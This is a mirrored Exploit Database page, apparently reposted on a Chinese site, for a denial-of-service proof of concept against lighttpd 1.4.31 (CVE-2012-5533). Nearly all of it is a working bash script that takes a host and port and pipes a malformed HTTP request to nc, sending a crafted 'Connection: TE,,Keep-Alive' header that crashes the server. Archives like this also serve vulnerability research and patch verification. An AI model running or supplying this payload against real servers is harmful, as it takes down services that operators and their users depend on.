lighttpd 1.4.31 – Denial of Service (PoC)

• Exploit Database
• 14 阅读

• 作者： t4c
  日期： 2012-11-22
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/22902/

• #!/bin/bash
  # Exploit Title: simple lighttpd 1.4.31 DOS POC
  # Date: 11/21/2012
  # Exploit Author: t4c@ghcif.de
  # Vendor Homepage: http://www.lighttpd.net
  # Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
  # Version: 1.4.31
  # Tested on: Debian Linux, Gentoo Linux, Arch Linux
  # CVE: CVE-2012-5533
  
  if [ $# -lt 2 ]
  then
  	echo "usage :$0 <Host/IP> <Port>"
  else
  	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
  fi